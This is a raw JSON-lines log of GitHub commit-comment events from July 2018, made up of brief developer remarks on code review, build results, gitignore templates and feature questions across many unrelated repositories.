{"id":"7965671364","type":"CommitCommentEvent","actor":{"login":"WerWolv98"},"repo":{"name":"thomasnet-mc/EdiZon"},"payload":{"comment":{"id":29709008,"position":null,"line":null,"path":null,"commit_id":"35df7745930442ad5c0a71261f4d4664d1199019","created_at":"2018-07-14T11:55:03Z","updated_at":"2018-07-14T11:55:03Z","author_association":"COLLABORATOR","body":"The PR for that was merged just after"}},"created_at":"2018-07-14T11:55:03Z"}
{"id":"7965671880","type":"CommitCommentEvent","actor":{"login":"JanOonk"},"repo":{"name":"VictorJuliani/chartjs-plugin-zoom"},"payload":{"comment":{"id":29709010,"position":null,"line":null,"path":null,"commit_id":"2666a2c203348b6f97b1b995619cbc77cca00911","created_at":"2018-07-14T11:55:31Z","updated_at":"2018-07-14T11:55:31Z","author_association":"NONE","body":"What does this fix exactly do/fix?\r\nWith (your) latest build I can't have pan and drag to zoom options both enabled. When you try to pan with LMB it also (drag to) zoom's."}},"created_at":"2018-07-14T11:55:31Z"}
{"id":"7965674640","type":"CommitCommentEvent","actor":{"login":"yuzi-co"},"repo":{"name":"yuzi-co/Forager"},"payload":{"comment":{"id":29709015,"position":null,"line":null,"path":null,"commit_id":"5d9252ccc8bc6bec79059b1fa553d3e8d382b990","created_at":"2018-07-14T11:58:10Z","updated_at":"2018-07-14T11:58:10Z","author_association":"OWNER","body":"Will fix )"}},"created_at":"2018-07-14T11:58:10Z"}
{"id":"7965674969","type":"CommitCommentEvent","actor":{"login":"inpercima"},"repo":{"name":"dvcs/gitignore"},"payload":{"comment":{"id":29709016,"position":7,"line":10,"path":"templates/Maven.gitignore","commit_id":"2118b1a3ca5c59a25903312499102a943ea81f63","created_at":"2018-07-14T11:58:31Z","updated_at":"2018-07-14T11:58:31Z","author_association":"CONTRIBUTOR","body":"Hi, can you explain why now this file should be ignored? I think this change is a mistake. Like the gradle-wrapper, this file should be unignored."}},"created_at":"2018-07-14T11:58:31Z"}
{"id":"7965675495","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29709019,"position":null,"line":null,"path":null,"commit_id":"98400849fb528e085c844df23dab368a48e2cc2d","created_at":"2018-07-14T11:59:05Z","updated_at":"2018-07-14T11:59:05Z","author_association":"MEMBER","body":"#1091 #1120"}},"created_at":"2018-07-14T11:59:05Z"}
{"id":"7965676348","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29709020,"position":null,"line":null,"path":null,"commit_id":"5a42706e317db9f60fe594748e6197814b0e1f1a","created_at":"2018-07-14T11:59:54Z","updated_at":"2018-07-14T11:59:54Z","author_association":"MEMBER","body":"welcome to the family "}},"created_at":"2018-07-14T11:59:54Z"}
{"id":"7965679024","type":"CommitCommentEvent","actor":{"login":"esipavicius"},"repo":{"name":"react-community/react-native-maps"},"payload":{"comment":{"id":29709029,"position":5,"line":36,"path":"package.json","commit_id":"d6d7a2708c55c120575ca68ca86a0b9f21763518","created_at":"2018-07-14T12:01:51Z","updated_at":"2018-07-14T12:01:51Z","author_association":"NONE","body":"? ;D\r\n"}},"created_at":"2018-07-14T12:01:51Z"}
{"id":"7965681378","type":"CommitCommentEvent","actor":{"login":"joeblau"},"repo":{"name":"dvcs/gitignore"},"payload":{"comment":{"id":29709031,"position":7,"line":10,"path":"templates/Maven.gitignore","commit_id":"2118b1a3ca5c59a25903312499102a943ea81f63","created_at":"2018-07-14T12:03:46Z","updated_at":"2018-07-14T12:03:46Z","author_association":"CONTRIBUTOR","body":"If this should be ignored, we need to add it in a `.patch` file.  The goal of this diff was try and keep our template repo up to date with the latest changes happening at github/gitignore.  I'll make a new `.patch` file with that line which will allow us to add it to the template."}},"created_at":"2018-07-14T12:03:46Z"}
{"id":"7965683491","type":"CommitCommentEvent","actor":{"login":"rubyglow"},"repo":{"name":"VCVRack/Rack"},"payload":{"comment":{"id":29709035,"position":null,"line":null,"path":null,"commit_id":"23f14c9f8c0d03dcc6f3e6d5ca6a982a541698cd","created_at":"2018-07-14T12:05:28Z","updated_at":"2018-07-14T12:05:28Z","author_association":"NONE","body":"Thanks Andrew! Will you tag this with v0.6.2?"}},"created_at":"2018-07-14T12:05:28Z"}
{"id":"7965687091","type":"CommitCommentEvent","actor":{"login":"RobinTHOREL"},"repo":{"name":"ButterCorp/ionic-4A"},"payload":{"comment":{"id":29709036,"position":null,"line":null,"path":null,"commit_id":"81ddd43699cb118517ce0d9a2941993bd1d45cd2","created_at":"2018-07-14T12:08:36Z","updated_at":"2018-07-14T12:08:36Z","author_association":"CONTRIBUTOR","body":"Nice commit on master branch. Launches page doesn't working anymore 👏 "}},"created_at":"2018-07-14T12:08:36Z"}
{"id":"7965687163","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29709037,"position":34,"line":69,"path":"src/main/kotlin/ml/duncte123/skybot/objects/EvalFunctions.kt","commit_id":"188cfe480be056378330b7391aabbf9666976598","created_at":"2018-07-14T12:08:41Z","updated_at":"2018-07-14T12:08:41Z","author_association":"MEMBER","body":"You shall use `#joinToString`"}},"created_at":"2018-07-14T12:08:41Z"}
{"id":"7965688038","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29709038,"position":34,"line":69,"path":"src/main/kotlin/ml/duncte123/skybot/objects/EvalFunctions.kt","commit_id":"188cfe480be056378330b7391aabbf9666976598","created_at":"2018-07-14T12:09:29Z","updated_at":"2018-07-14T12:09:29Z","author_association":"MEMBER","body":"That would only print 1 shard"}},"created_at":"2018-07-14T12:09:29Z"}
{"id":"7965688479","type":"CommitCommentEvent","actor":{"login":"YunTin"},"repo":{"name":"YunTin/YunTin-s-Repository"},"payload":{"comment":{"id":29709040,"position":null,"line":null,"path":null,"commit_id":"3567fc00258c85384722dd40adbf4994845cb8ce","created_at":"2018-07-14T12:09:54Z","updated_at":"2018-07-14T12:09:54Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-14T12:09:54Z"}
{"id":"7965689104","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29709043,"position":34,"line":69,"path":"src/main/kotlin/ml/duncte123/skybot/objects/EvalFunctions.kt","commit_id":"188cfe480be056378330b7391aabbf9666976598","created_at":"2018-07-14T12:10:28Z","updated_at":"2018-07-14T12:10:28Z","author_association":"MEMBER","body":"No? Why would it?"}},"created_at":"2018-07-14T12:10:28Z"}
{"id":"7965689959","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29709045,"position":34,"line":69,"path":"src/main/kotlin/ml/duncte123/skybot/objects/EvalFunctions.kt","commit_id":"188cfe480be056378330b7391aabbf9666976598","created_at":"2018-07-14T12:11:11Z","updated_at":"2018-07-14T12:11:11Z","author_association":"MEMBER","body":"![1durglc94m 1](https://user-images.githubusercontent.com/8843386/42724290-c14971fc-876f-11e8-85f5-325c210c14d5.png)\r\n"}},"created_at":"2018-07-14T12:11:11Z"}
{"id":"7965689979","type":"CommitCommentEvent","actor":{"login":"joeblau"},"repo":{"name":"dvcs/gitignore"},"payload":{"comment":{"id":29709046,"position":7,"line":10,"path":"templates/Maven.gitignore","commit_id":"2118b1a3ca5c59a25903312499102a943ea81f63","created_at":"2018-07-14T12:11:11Z","updated_at":"2018-07-14T12:11:11Z","author_association":"CONTRIBUTOR","body":"This PR should fix this issue: https://github.com/dvcs/gitignore/pull/123"}},"created_at":"2018-07-14T12:11:11Z"}
{"id":"7965690484","type":"CommitCommentEvent","actor":{"login":"MouliTadinada"},"repo":{"name":"MouliTadinada/Reddit-Clone"},"payload":{"comment":{"id":29709051,"position":null,"line":null,"path":null,"commit_id":"8513a06b082a8937a658a450023b58024a48eb37","created_at":"2018-07-14T12:11:37Z","updated_at":"2018-07-14T12:11:37Z","author_association":"OWNER","body":"This commit fixed #1!"}},"created_at":"2018-07-14T12:11:37Z"}
{"id":"7965690524","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29709054,"position":34,"line":69,"path":"src/main/kotlin/ml/duncte123/skybot/objects/EvalFunctions.kt","commit_id":"188cfe480be056378330b7391aabbf9666976598","created_at":"2018-07-14T12:11:39Z","updated_at":"2018-07-14T12:11:39Z","author_association":"MEMBER","body":"I share more guilds with it"}},"created_at":"2018-07-14T12:11:39Z"}
{"id":"7965691822","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29709057,"position":34,"line":69,"path":"src/main/kotlin/ml/duncte123/skybot/objects/EvalFunctions.kt","commit_id":"188cfe480be056378330b7391aabbf9666976598","created_at":"2018-07-14T12:12:46Z","updated_at":"2018-07-14T12:12:46Z","author_association":"MEMBER","body":"Odd. In my testing it worked."}},"created_at":"2018-07-14T12:12:46Z"}
{"id":"7965692425","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29709058,"position":34,"line":69,"path":"src/main/kotlin/ml/duncte123/skybot/objects/EvalFunctions.kt","commit_id":"188cfe480be056378330b7391aabbf9666976598","created_at":"2018-07-14T12:13:22Z","updated_at":"2018-07-14T12:13:22Z","author_association":"MEMBER","body":"How many shards and shared guilds did you test it with?"}},"created_at":"2018-07-14T12:13:22Z"}
{"id":"7965693451","type":"CommitCommentEvent","actor":{"login":"recepgums"},"repo":{"name":"recepgums/deneme"},"payload":{"comment":{"id":29709061,"position":null,"line":null,"path":null,"commit_id":"a72aeaa5ea9cd293290e1942c87dc21f71d06f40","created_at":"2018-07-14T12:14:15Z","updated_at":"2018-07-14T12:14:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [CSS](https://trello.com/c/TEn8pHkR/73-css)"}},"created_at":"2018-07-14T12:14:15Z"}
{"id":"7965693808","type":"CommitCommentEvent","actor":{"login":"recepgums"},"repo":{"name":"recepgums/deneme"},"payload":{"comment":{"id":29709062,"position":null,"line":null,"path":null,"commit_id":"2511e19cb18a230f5bdc440ed0070fc767bdea02","created_at":"2018-07-14T12:14:36Z","updated_at":"2018-07-14T12:14:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [CSS](https://trello.com/c/TEn8pHkR/73-css)"}},"created_at":"2018-07-14T12:14:36Z"}
{"id":"7965695713","type":"CommitCommentEvent","actor":{"login":"giant-magic-light"},"repo":{"name":"giant-magic-light/hello-world"},"payload":{"comment":{"id":29709071,"position":1,"line":1,"path":"README.md","commit_id":"cc6cfb29bf5b72e01c5c114ee31d5c12df40ed6b","created_at":"2018-07-14T12:15:55Z","updated_at":"2018-07-14T12:15:55Z","author_association":"OWNER","body":"<?php \r\n$life=money;\r\necho $life\r\n?>"}},"created_at":"2018-07-14T12:15:55Z"}
{"id":"7965695958","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709072,"position":null,"line":null,"path":null,"commit_id":"814372513e0b5ca20e00518737f7c55dc7bf5dbf","created_at":"2018-07-14T12:16:07Z","updated_at":"2018-07-14T12:16:07Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2316 of 2316 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-14T12:16:07Z"}
{"id":"7965696087","type":"CommitCommentEvent","actor":{"login":"Zathoici"},"repo":{"name":"Grusomme/Reserate-Porta"},"payload":{"comment":{"id":29709075,"position":null,"line":null,"path":null,"commit_id":"c35def1cfee2fc2cb22d9046238ee8d2cf3dc9e8","created_at":"2018-07-14T12:16:12Z","updated_at":"2018-07-14T12:16:12Z","author_association":"COLLABORATOR","body":"Initial table design."}},"created_at":"2018-07-14T12:16:12Z"}
{"id":"7965697539","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709081,"position":null,"line":null,"path":null,"commit_id":"814372513e0b5ca20e00518737f7c55dc7bf5dbf","created_at":"2018-07-14T12:17:31Z","updated_at":"2018-07-14T12:17:31Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T12:17:31Z"}
{"id":"7965699082","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29709086,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-14T12:18:53Z","updated_at":"2018-07-14T12:18:53Z","author_association":"CONTRIBUTOR","body":"@lukehutch I thought supplier was 1.8+?"}},"created_at":"2018-07-14T12:18:53Z"}
{"id":"7965700199","type":"CommitCommentEvent","actor":{"login":"jms30"},"repo":{"name":"jms30/SDN_Firewall"},"payload":{"comment":{"id":29709095,"position":null,"line":null,"path":null,"commit_id":"a7d09dc3e466c58fa1e9139bef368861f8bb24a1","created_at":"2018-07-14T12:19:52Z","updated_at":"2018-07-14T12:19:52Z","author_association":"OWNER","body":"Hi,\n\nSorry for quite late response.\nRegarding your question: No. If you look at the firewall_stateful.txt and\nfirewall_stateless.txt rule files, you could see that one has to configure\nrules per 'individual' bases. The rules need to be specific with a source\nand a destination host, rather than for a whole network.\nHowever, you can definitely enhance the rule logic by re-writing the\nparsing on your own. [Which is anyhow a complete f*cked up code] :)\n\nBest Regards,\nJay\n\nOn 4 June 2018 at 19:53, tongas321 <notifications@github.com> wrote:\n\n> Hello, i have a question, first, you had done a very great work with this\n> firewall, it is very usefull, my question is, can i apply firewall rules\n> for an entire net, for example, allow ICMP messages between my host and\n> entire net 192.168.50.0/24? have i to modify some code?. I am sorry for\n> my english. i hope you understand me.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jms30/SDN_Firewall/commit/a7d09dc3e466c58fa1e9139bef368861f8bb24a1#commitcomment-29237229>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFETP7xyKJXqGNWiQB19fm85aADadP1Vks5t5XQagaJpZM4ESltS>\n> .\n>\n"}},"created_at":"2018-07-14T12:19:52Z"}
{"id":"7965700791","type":"CommitCommentEvent","actor":{"login":"douglasnaphas"},"repo":{"name":"douglasnaphas/configs"},"payload":{"comment":{"id":29709099,"position":null,"line":null,"path":null,"commit_id":"28173f36f4c06f03ffc51bdc46e475aa5683bfbc","created_at":"2018-07-14T12:20:20Z","updated_at":"2018-07-14T12:20:20Z","author_association":"OWNER","body":"http://vim.wikia.com/wiki/How_to_stop_auto_indenting"}},"created_at":"2018-07-14T12:20:20Z"}
{"id":"7965701641","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29709101,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-14T12:21:10Z","updated_at":"2018-07-14T12:21:10Z","author_association":"CONTRIBUTOR","body":"Animal sniffer and enforcer are a good combination to avoid pulling in incompatible classes by mistake."}},"created_at":"2018-07-14T12:21:10Z"}
{"id":"7965702727","type":"CommitCommentEvent","actor":{"login":"recepgums"},"repo":{"name":"recepgums/deneme"},"payload":{"comment":{"id":29709108,"position":null,"line":null,"path":null,"commit_id":"2511e19cb18a230f5bdc440ed0070fc767bdea02","created_at":"2018-07-14T12:22:09Z","updated_at":"2018-07-14T12:22:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [CSS](https://trello.com/c/TEn8pHkR/73-css)"}},"created_at":"2018-07-14T12:22:09Z"}
{"id":"7965703377","type":"CommitCommentEvent","actor":{"login":"recepgums"},"repo":{"name":"recepgums/deneme"},"payload":{"comment":{"id":29709109,"position":null,"line":null,"path":null,"commit_id":"a72aeaa5ea9cd293290e1942c87dc21f71d06f40","created_at":"2018-07-14T12:22:44Z","updated_at":"2018-07-14T12:22:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [CSS](https://trello.com/c/TEn8pHkR/73-css)"}},"created_at":"2018-07-14T12:22:44Z"}
{"id":"7965710503","type":"CommitCommentEvent","actor":{"login":"snlg"},"repo":{"name":"snlg/tiger"},"payload":{"comment":{"id":29709132,"position":1,"line":1,"path":"README.md","commit_id":"deabf62c08ee876b2d377e97380333414a494c41","created_at":"2018-07-14T12:28:43Z","updated_at":"2018-07-14T12:28:43Z","author_association":"OWNER","body":"**\r\n拿你当人的时候，你尽量装得像点好吗？\r\n你个野种啊，我觉得你还没有进化好。\r\n我就不明白了，你留着点屁朝天上放也能补补臭氧层呢？\r\n**"}},"created_at":"2018-07-14T12:28:43Z"}
{"id":"7965711245","type":"CommitCommentEvent","actor":{"login":"Kevingili"},"repo":{"name":"ButterCorp/ionic-4A"},"payload":{"comment":{"id":29709134,"position":null,"line":null,"path":null,"commit_id":"81ddd43699cb118517ce0d9a2941993bd1d45cd2","created_at":"2018-07-14T12:29:17Z","updated_at":"2018-07-14T12:29:17Z","author_association":"CONTRIBUTOR","body":"At this point, launches page works, you can check with git head..."}},"created_at":"2018-07-14T12:29:17Z"}
{"id":"7965711588","type":"CommitCommentEvent","actor":{"login":"c32ff0"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":29709136,"position":null,"line":null,"path":null,"commit_id":"1d6997ba137a58a8a7f8f60ef37851a7dbbf99e5","created_at":"2018-07-14T12:29:37Z","updated_at":"2018-07-14T12:29:37Z","author_association":"NONE","body":"whouldn't it be useful to have the available flags thoguh ? "}},"created_at":"2018-07-14T12:29:37Z"}
{"id":"7965713824","type":"CommitCommentEvent","actor":{"login":"recepgums"},"repo":{"name":"recepgums/test"},"payload":{"comment":{"id":29709142,"position":null,"line":null,"path":null,"commit_id":"b46d02c5eff3af8c0f9ff581558313e95539c413","created_at":"2018-07-14T12:31:21Z","updated_at":"2018-07-14T12:31:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [CSS](https://trello.com/c/TEn8pHkR/73-css)"}},"created_at":"2018-07-14T12:31:21Z"}
{"id":"7965715552","type":"CommitCommentEvent","actor":{"login":"BueVest"},"repo":{"name":"liblouis/liblouis"},"payload":{"comment":{"id":29709145,"position":null,"line":null,"path":null,"commit_id":"ab6b08537148a1cf86751e4ee6d7cc129f017099","created_at":"2018-07-14T12:32:52Z","updated_at":"2018-07-14T12:32:52Z","author_association":"COLLABORATOR","body":"Yes, I thought to check the outgoing characters in putchars() and then change the variable accordingly. I thought it would be best to check it in putchars() because that is where all output ends up.\n\n \n\nI am trying to find out about numeric mode, but it looks a bit more tricky.\n\n \n\nWhat do you think?\n\n \n\n"}},"created_at":"2018-07-14T12:32:52Z"}
{"id":"7965716033","type":"CommitCommentEvent","actor":{"login":"xxxWILL-INFxxx"},"repo":{"name":"Muqsit/InvMenu"},"payload":{"comment":{"id":29709146,"position":null,"line":null,"path":null,"commit_id":"5471ac344a7c7d7acb70f7ebea460a8ff73192fd","created_at":"2018-07-14T12:33:22Z","updated_at":"2018-07-14T12:33:22Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-14T12:33:22Z"}
{"id":"7965717517","type":"CommitCommentEvent","actor":{"login":"c32ff0"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":29709150,"position":null,"line":null,"path":null,"commit_id":"1d6997ba137a58a8a7f8f60ef37851a7dbbf99e5","created_at":"2018-07-14T12:34:44Z","updated_at":"2018-07-14T12:34:44Z","author_association":"NONE","body":"wouldn't it be useful to know the available options though?"}},"created_at":"2018-07-14T12:34:44Z"}
{"id":"7965722390","type":"CommitCommentEvent","actor":{"login":"inpercima"},"repo":{"name":"dvcs/gitignore"},"payload":{"comment":{"id":29709157,"position":7,"line":10,"path":"templates/Maven.gitignore","commit_id":"2118b1a3ca5c59a25903312499102a943ea81f63","created_at":"2018-07-14T12:38:37Z","updated_at":"2018-07-14T12:38:37Z","author_association":"CONTRIBUTOR","body":"Thank you for your answer and fast reaction. After some research I found this PR https://github.com/github/gitignore/pull/2658. Some projects do not allow binaries in the project, so the wrapper should also be ignored. The technique of the Maven wrapper seems to allow to download it if the file does not exists and so it could be ignored. I will check if this is a well-known procedure."}},"created_at":"2018-07-14T12:38:37Z"}
{"id":"7965723739","type":"CommitCommentEvent","actor":{"login":"brettwooldridge"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29709158,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T12:39:27Z","updated_at":"2018-07-14T12:39:27Z","author_association":"OWNER","body":"@bturner Facebook's Buck project rejected the latest version of NuProcess due to reported \"alignment\" issues.  There were no such reports before, so I am suspecting this change.  Was this a necessary change (fixing an issue) or did it merely seem like a Good Idea?\r\n"}},"created_at":"2018-07-14T12:39:27Z"}
{"id":"7965724857","type":"CommitCommentEvent","actor":{"login":"Counterply"},"repo":{"name":"Counterply/asmFish"},"payload":{"comment":{"id":29709163,"position":null,"line":null,"path":null,"commit_id":"c11dab61092fac259b20d14d93930afae7f74cc6","created_at":"2018-07-14T12:40:09Z","updated_at":"2018-07-14T12:40:09Z","author_association":"OWNER","body":"@double-beep\r\n\r\nI think I found a trick that could save us a few instructions here. It takes advantage of the fact that the _popcnt simulation is sensitive to potential register shortages by careful juggling the value of the second input register. It is perfect for situations like this one where there simply aren't any free registers.\r\n\r\nCould you verify that it works on your CPU as well?"}},"created_at":"2018-07-14T12:40:09Z"}
{"id":"7965727563","type":"CommitCommentEvent","actor":{"login":"jfoclpf"},"repo":{"name":"jfoclpf/autocosts"},"payload":{"comment":{"id":29709166,"position":69,"line":229,"path":"src/css/style.css","commit_id":"b920bbd744248df57c92694450c2b8b57f77752e","created_at":"2018-07-14T12:41:45Z","updated_at":"2018-07-14T12:41:45Z","author_association":"OWNER","body":"@mcristaldo \r\n\r\nI need this class \"bottom_spacer\", such that, the form is not glued to the bottom. May I re-add this line to CSS?"}},"created_at":"2018-07-14T12:41:45Z"}
{"id":"7965729473","type":"CommitCommentEvent","actor":{"login":"stasis416"},"repo":{"name":"HenryFBP/keto_tracker"},"payload":{"comment":{"id":29709170,"position":null,"line":null,"path":null,"commit_id":"a18f5f52411d27502a2274eed6ba58051d35a212","created_at":"2018-07-14T12:43:20Z","updated_at":"2018-07-14T12:43:20Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-14T12:43:20Z"}
{"id":"7965731463","type":"CommitCommentEvent","actor":{"login":"bvhme"},"repo":{"name":"bvhme/test-repo"},"payload":{"comment":{"id":29709175,"position":null,"line":null,"path":null,"commit_id":"4c2532b253f80534e1ebd03418a09cba6f017f69","created_at":"2018-07-14T12:45:02Z","updated_at":"2018-07-14T12:45:02Z","author_association":"OWNER","body":"Interesting that you can comment on commits"}},"created_at":"2018-07-14T12:45:02Z"}
{"id":"7965733980","type":"CommitCommentEvent","actor":{"login":"thawtes"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29709180,"position":null,"line":null,"path":null,"commit_id":"028194a39ad2e005b68605018f8d339b8983c82a","created_at":"2018-07-14T12:47:04Z","updated_at":"2018-07-14T12:47:04Z","author_association":"NONE","body":"thank you @atvcaptain "}},"created_at":"2018-07-14T12:47:04Z"}
{"id":"7965734072","type":"CommitCommentEvent","actor":{"login":"rutakokil12"},"repo":{"name":"rutakokil12/hhBuilder"},"payload":{"comment":{"id":29709181,"position":null,"line":null,"path":null,"commit_id":"524e023116423f4907383c6fd38debc6b9d7a0dc","created_at":"2018-07-14T12:47:09Z","updated_at":"2018-07-14T12:47:09Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-14T12:47:09Z"}
{"id":"7965734973","type":"CommitCommentEvent","actor":{"login":"kscanne"},"repo":{"name":"kscanne/gaelspell"},"payload":{"comment":{"id":29709183,"position":null,"line":null,"path":null,"commit_id":"6009af88f8ac378e16b65c13534a8922d6613e20","created_at":"2018-07-14T12:47:55Z","updated_at":"2018-07-14T12:47:55Z","author_association":"OWNER","body":"Thanks for catching this - I'll fix it in the next couple of days. There are some changes in the above commit I want to keep so I'll find a different way to sort it out."}},"created_at":"2018-07-14T12:47:55Z"}
{"id":"7965735014","type":"CommitCommentEvent","actor":{"login":"oduvan"},"repo":{"name":"CheckiO/checkio-client"},"payload":{"comment":{"id":29709184,"position":11,"line":11,"path":"checkio_client/actions/init.py","commit_id":"926cbdeaa3e45abd29c35d87abc4b87c0c756fcf","created_at":"2018-07-14T12:47:57Z","updated_at":"2018-07-14T12:47:57Z","author_association":"COLLABORATOR","body":"fixed, thanks"}},"created_at":"2018-07-14T12:47:57Z"}
{"id":"7965737239","type":"CommitCommentEvent","actor":{"login":"Muqsit"},"repo":{"name":"Muqsit/InvMenu"},"payload":{"comment":{"id":29709190,"position":null,"line":null,"path":null,"commit_id":"5471ac344a7c7d7acb70f7ebea460a8ff73192fd","created_at":"2018-07-14T12:49:56Z","updated_at":"2018-07-14T12:49:56Z","author_association":"OWNER","body":"Calling `clone` on an `InvMenu` instance would share the inventory instance among the cloned and the real `InvMenu` which leads to undesirable behaviours such as:\r\n```php\r\n/** @var InvMenu $menu */\r\n/** @var callable $callable */\r\n/** @var Player $player */\r\n$cloned = clone $menu;\r\n$cloned->setName(\"A custom name\");\r\n$cloned->setListener($callable);\r\n$cloned->send($player);\r\n/**\r\n * Result:\r\n *  $player is sent the InvMenu without a custom name\r\n *  and the callable never gets called.\r\n */\r\n```\r\n\r\nRefer https://github.com/Muqsit/InvMenu/commit/f123bccef3bfebb7599f4fd860ae59b6cf6f35dc\r\n"}},"created_at":"2018-07-14T12:49:56Z"}
{"id":"7965737252","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"SpecterTeam/ProxyChecker"},"payload":{"comment":{"id":29709192,"position":null,"line":null,"path":null,"commit_id":"86b5131009ded9badf59fb39ff08355fb81d673a","created_at":"2018-07-14T12:49:56Z","updated_at":"2018-07-14T12:49:56Z","author_association":"NONE","body":"@Thunder33345's statement is inaccurate. The main point is that you are using an online API **with unclear background and optionally paid features**. Since we cannot review your online API, we won't know if you will abuse it."}},"created_at":"2018-07-14T12:49:56Z"}
{"id":"7965739241","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"ToxicMushroom/Melijn"},"payload":{"comment":{"id":29709195,"position":5,"line":21,"path":"src/main/java/com/pixelatedsource/jda/commands/management/SetJoinMessageCommand.java","commit_id":"93f90bb54835c2baab531af0efe4f848b7ec29af","created_at":"2018-07-14T12:51:34Z","updated_at":"2018-07-14T12:51:34Z","author_association":"NONE","body":"miauw ik ben een kat"}},"created_at":"2018-07-14T12:51:34Z"}
{"id":"7965740155","type":"CommitCommentEvent","actor":{"login":"denniskavadas"},"repo":{"name":"zerotier/ZeroTierNAS"},"payload":{"comment":{"id":29709198,"position":null,"line":null,"path":null,"commit_id":"7486f5a6c855e22cb164e2e1dccf69c8cf5a6c06","created_at":"2018-07-14T12:52:23Z","updated_at":"2018-07-14T12:52:23Z","author_association":"NONE","body":"where can we download the arm-x19 qpkg ?"}},"created_at":"2018-07-14T12:52:23Z"}
{"id":"7965742208","type":"CommitCommentEvent","actor":{"login":"denniskavadas"},"repo":{"name":"zerotier/ZeroTierNAS"},"payload":{"comment":{"id":29709203,"position":null,"line":null,"path":null,"commit_id":"7486f5a6c855e22cb164e2e1dccf69c8cf5a6c06","created_at":"2018-07-14T12:54:12Z","updated_at":"2018-07-14T12:54:12Z","author_association":"NONE","body":"is there a qpkg file for arm-x19 for zerotier ?"}},"created_at":"2018-07-14T12:54:12Z"}
